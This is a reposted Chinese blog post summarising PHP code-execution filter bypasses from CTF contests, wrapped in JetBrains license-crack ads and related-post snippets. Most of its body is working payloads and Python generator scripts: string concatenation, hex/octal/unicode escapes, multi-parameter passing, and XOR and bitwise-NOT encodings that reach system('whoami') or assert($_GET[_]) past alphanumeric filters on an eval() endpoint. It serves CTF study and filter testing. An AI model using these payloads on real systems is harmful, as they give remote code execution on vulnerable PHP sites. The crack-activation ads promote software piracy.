php弱类型花式绕过大全_协同过滤推荐算法代码

php弱类型花式绕过大全_协同过滤推荐算法代码参考:https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.htmlhttps://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html字符串异或绕过只适用于PHP5

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE稳定放心使用

本篇文章总结于本人在CTF比赛中碰到的各种代码执行绕过方法


代码执行函数

首先来看看在PHP中有哪些函数有代码执行的功能

eval()

最常见的代码执行函数,把字符串 code 作为PHP代码执行。

eval ( string $code ) : mixed

assert()

检查一个断言是否为false

PHP 5
assert ( mixed $assertion [, string $description ] ) : bool
PHP 7
assert ( mixed $assertion [, Throwable $exception ] ) : bool

assert()会检查指定的assertion并在结果为false时采取适当的行动。在PHP5PHP7中,如果assertion是字符串,它将会被assert()当做PHP代码来执行。

preg_replace()+/e

执行一个正则表达式的搜索和替换

preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] ) : mixed

搜索subject中匹配pattern的部分,以replacement进行替换。如果pattern的模式修饰符使用/e,那么当subject被匹配成功时,replacement会被当做PHP代码执行

PS: preg_replace()+函数的/e修饰符在PHP7中被移除

在这里插入图片描述
在这里插入图片描述

create_function()

创建一个匿名(lambda样式)函数

create_function ( string $args , string $code ) : string

根据传递的参数创建一个匿名函数,并为其返回唯一的名称。如果没有严格对参数传递进行过滤,攻击者可以构造payload传递给create_function()参数或函数体闭合注入恶意代码导致代码执行
在这里插入图片描述

可回调函数

array_map()

为数组的每个元素应用回调函数

array_map ( callable $callback , array $array , array ...$arrays ) : array

返回数组,是为array每个元素应用callback函数之后的数组。 array_map()返回一个array,数组内容为array1的元素按索引顺序为参数调用callback后的结果(有更多数组时,还会传入arrays的元素)。 callback函数形参的数量必须匹配array_map()实参中数组的数量。
在这里插入图片描述
call_user_func()

把第一个参数作为回调函数调用

call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] ) : mixed

第一个参数callback是被调用的回调函数,其余参数是回调函数的参数。
在这里插入图片描述

call_user_func_array()

调用回调函数,并把一个数组参数作为回调函数的参数

call_user_func_array ( callable $callback , array $param_arr ) : mixed

把第一个参数作为回调函数callback调用,把参数数组作param_arr为回调函数的的参数传入。跟array_map()相似
在这里插入图片描述

array_filter()

用回调函数过滤数组中的单元

array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array

依次将array数组中的每个值传递到callback函数。如果callback函数返回true,则array数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。
在这里插入图片描述

usort()

使用用户自定义的比较函数对数组中的值进行排序

usort ( array &$array , callable $value_compare_func ) : bool

本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数。

PHP < 5.6
在这里插入图片描述
PHP >= 5.6 & PHP < 7时,php有一个参数变长特性
在这里插入图片描述
等等还有很多函数参数是可回调的,就不一一列举了。

接下来根据各种过滤情况来看看具体的一些绕过方法

字符串拼接绕过

字符串拼接绕过适用于绕过过滤具体关键字的限制

适用PHP版本:PHP>=7

在这里插入图片描述

Payload:

(p.h.p.i.n.f.o)();
(sy.(st).em)(whoami);
(sy.(st).em)(who.ami);
(s.y.s.t.e.m)("whoami");
.......

在PHP中不一定需要引号(单引号/双引号)来表示字符串。PHP支持我们声明元素的类型,比如$name = (string)mochu7;,在这种情况下,$name就包含字符串"mochu7",此外,如果不显示声明类型,那么PHP会将圆括号内的数据当成字符串来处理

字符串转义绕过

适用PHP版本:PHP>=7

以八进制表示的\[0–7]{1,3}转义字符会自动适配byte(如"\400" == “\000”
以十六进制的\x[0–9A-Fa-f]{1,2}转义字符表示法(如“\x41"
以Unicode表示的\u{[0–9A-Fa-f]+}字符,会输出为UTF-8字符串

注意这里转义后的字符必须双引号包裹传参

Payload处理脚本如下:

# -*- coding:utf-8 -*-

def hex_payload(payload):
	res_payload = ''
	for i in payload:
		i = "\\x" + hex(ord(i))[2:]
		res_payload += i
	print("[+]'{}' Convert to hex: \"{}\"".format(payload,res_payload))

def oct_payload(payload):
	res_payload = ""
	for i in payload:
		i = "\\" + oct(ord(i))[2:]
		res_payload += i
	print("[+]'{}' Convert to oct: \"{}\"".format(payload,res_payload))

def uni_payload(payload):
	res_payload = ""
	for i in payload:
		i = "\\u{ 
   { 
   {0}}}".format(hex(ord(i))[2:])
		res_payload += i
	print("[+]'{}' Convert to unicode: \"{}\"".format(payload,res_payload))

if __name__ == '__main__':
	payload = 'phpinfo'
	hex_payload(payload)
	oct_payload(payload)
	uni_payload(payload)

Payload

"\x70\x68\x70\x69\x6e\x66\x6f"();#phpinfo();
"\163\171\163\164\145\155"('whoami');#system('whoami');
"\u{73}\u{79}\u{73}\u{74}\u{65}\u{6d}"('id');#system('whoami');
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
.......

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
另外,八进制的方法可以绕过无字母传参进行代码执行

"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');

在这里插入图片描述

多次传参绕过

适用PHP版本:无限制

如果过滤了引号(单引号/双引号),可以通过以下方法绕过
在这里插入图片描述

GET:
?1=system&2=whoami
POST:
cmd=$_GET[1]($_GET[2]);

在这里插入图片描述

cmd=$_POST[1]($_POST[2]);&1=system&2=whoami

如果PHP版本大于7这里还可以用拼接的方法绕过过滤引号

(sy.st.em)(whoami);

另外如果碰到参数长度受限制,也可以通过多次传参的方法绕过参数长度限制或者回调函数
在这里插入图片描述
回调函数可能大部分看限制的具体长度,但是在PHP >= 5.6 & PHP < 7时对以上过滤方法可以绕过

在这里插入图片描述

内置函数访问绕过

适用于PHP版本:Windows本地测试的是PHP>=7可以成功,PHP5测试虽然报错但是并不肯定不能使用

get_defined_functions():返回所有已定义函数的数组

详情见:https://www.php.net/manual/zh/function.get-defined-functions.php

利用这种方法首先还需要知道PHP的具体版本,因为每个版本的get_defined_functions()返回的值都是不一样的,这里以php7.4.3为准
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

异或绕过

适用PHP版本:无限制

在PHP中两个字符串异或之后,得到的还是一个字符串。
例如:我们异或 ?~ 之后得到的是 A
图一

字符:?         ASCII码:63           二进制:  00‭11 1111‬
字符:~         ASCII码:126          二进制:  0111 1110‬
异或规则:
1   XOR   0   =   1
0   XOR   1   =   1
0   XOR   0   =   0
1   XOR   1   =   0
上述两个字符异或得到 二进制:  0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A

接下来看一道例题:

<?php
highlight_file(__FILE__);
error_reporting(0);
if(preg_match('/[a-z0-9]/is', $_GET['shell'])){ 
   
	echo "hacker!!";
}else{ 
   
	eval($_GET['shell']);
}
?>

过滤了所有英文字母和数字,但是我们知道ASCII码中还有很多字母数字之外的字符,利用这些字符进行异或可以得到我们想要的字符

PS:取ASCII表种非字母数字的其他字符,要注意有些字符可能会影响整个语句执行,所以要去掉如:反引号,单引号

脚本如下:

# -*- coding: utf-8 -*-

payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''

for char in payload:
    for i in strlist:
        for j in strlist:
            if(i ^ j == ord(char)):
                i = '%{:0>2}'.format(hex(i)[2:])
                j = '%{:0>2}'.format(hex(j)[2:])
                print("('{0}'^'{1}')".format(i,j),end=".")
                break
        else:
            continue
        break

一次代码执行只能得到我们想要执行语句的字符串,并不能执行语句,所以需要执行两次代码执行,构造

assert($_GET[_]);

使用脚本对每个字母进行转换,然后拼接

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');
//$_='assert';
$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');
//$__='_GET';
$___=$$__;
//$___='$_GET';
$_($___[_]);
//assert($_GET[_]);

payload

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');$___=$$__;$_($___[_]);&_=phpinfo();

在这里插入图片描述
经本地测试,发现这种方法可以在php5以及php7.0.9版本种使用,因为assert()的问题,并不是异或不能使用
注:PHP5低版本有些可能因为magic_quotes_gpc开启的关系导致无法利用
在这里插入图片描述
当过滤字符的范围没有那么大,或者只是过滤关键字的时候可以使用如下脚本

# -*- coding: utf-8 -*-
import string

char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print("('{}'^'{}')".format(tmp1,tmp2))
PS C:\Users\Administrator> php -r "var_dump('000000'^'CICDU]');"
Command line code:1:
string(6) "system"

在这里插入图片描述
再放个网上看到的payload

${%ff%ff%ff%ff^%a0%b8%ba%ab}{ 
   %ff}();&%ff=phpinfo
//${_GET}{ 
   %ff}();&%ff=phpinfo

URL编码取反绕过

适用PHP版本:无限制

还是上面那个例题
PHP>=7时,可以直接利用取反构造payload

PS C:\Users\Administrator> php -r "var_dump(urlencode(~'phpinfo'));"
Command line code:1:
string(21) "%8F%97%8F%96%91%99%90"
(~%8F%97%8F%96%91%99%90)();
#phpinfo();

在这里插入图片描述
有参数的

PS C:\Users\Administrator> php -r "var_dump(urlencode(~'system'));"
Command line code:1:
string(18) "%8C%86%8C%8B%9A%92"
PS C:\Users\Administrator> php -r "var_dump(urlencode(~'whoami'));"
Command line code:1:
string(18) "%88%97%90%9E%92%96"

payload

(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96);
#system('whoami');

在这里插入图片描述

5<=PHP<=7.0.9时,需要再执行一次构造出来的字符,所以参考上面那种异或拼接的方法

$_=(~'%9E%8C%8C%9A%8D%8B');$__='_'.(~'%AF%B0%AC%AB');$___=$$__;$_($___[_]);
#assert($_POST[_]);

在这里插入图片描述


参考链接:

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/186775.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

  • idea在类中搜索方法的快捷键_idea控制台搜索快捷键

    idea在类中搜索方法的快捷键_idea控制台搜索快捷键展开全部IntelliJIDEA代码常用的快捷键有:Alt+回车导入包,自动修正Ctrl+N查找类Ctrl+Shift+N查找文件Ctrl+Alt+L格式e69da5e887aa62616964757a686964616f31333365646234化代码Ctrl+Alt+O优化导入的类和包Alt+Insert生成代码(如get,set方法,构造函数等)Ctrl+E或者Alt+…

    2022年10月10日
  • pycharm定义函数无法运行_把一个命令按钮设置成无效

    pycharm定义函数无法运行_把一个命令按钮设置成无效Pycharm命令行Terminal命令无效欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML图表FLowchart流程图导出与…

  • 关于java的垃圾回收机制,下面哪些结论_java垃圾回收算法有哪些

    关于java的垃圾回收机制,下面哪些结论_java垃圾回收算法有哪些本篇文章介绍了Java的垃圾回收机制、引用类型、JVM一次完整的GC流程、垃圾回收算法以及经典的垃圾回收器

  • MATLAB求解线性规划(含整数规划和0-1规划)问题[通俗易懂]

    MATLAB求解线性规划(含整数规划和0-1规划)问题[通俗易懂]线性规划是数学规划中的一类最简单规划问题,常见的线性规划是一个有约束的,变量范围为有理数的线性规划。如:对于这类线性规划问题,数学理论已经较为完善,可以有多种方法求解此类问题。但写这篇文章的目的并不是为了介绍数学理论,我们这里主要讲解如果利用工具求解这一类线性规划问题。最著名,同时也是最强大的数学最优化软件是LINGO/LINDO软件包,它能够求解多种的数学规划问题,同时还提供了多

  • information leakage._information interview

    information leakage._information interviewhttps://www.owasp.org/index.php/Information_LeakageExamplesExample1Thefollowingcodeprintsthepathenvironmentvariabletothestandarderrorstream: char*path=getenv(“PATH”); …

  • pycharm2018打不开_pycharm indexing

    pycharm2018打不开_pycharm indexingpycharm2020无法打开,点击无反应,今天我碰到这现象,总结大体原因为2种第1种:C:\Users\ygw\AppData\Roaming\JetBrains(删除该目录即可,一般由于升级安装或安装两个不同版本会存在老旧文件影响导致)第2种:进行过激活成功教程,修改了pycharm64.exe.vmoptions配置,其中存在错误配置或配置中的指定jar…

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号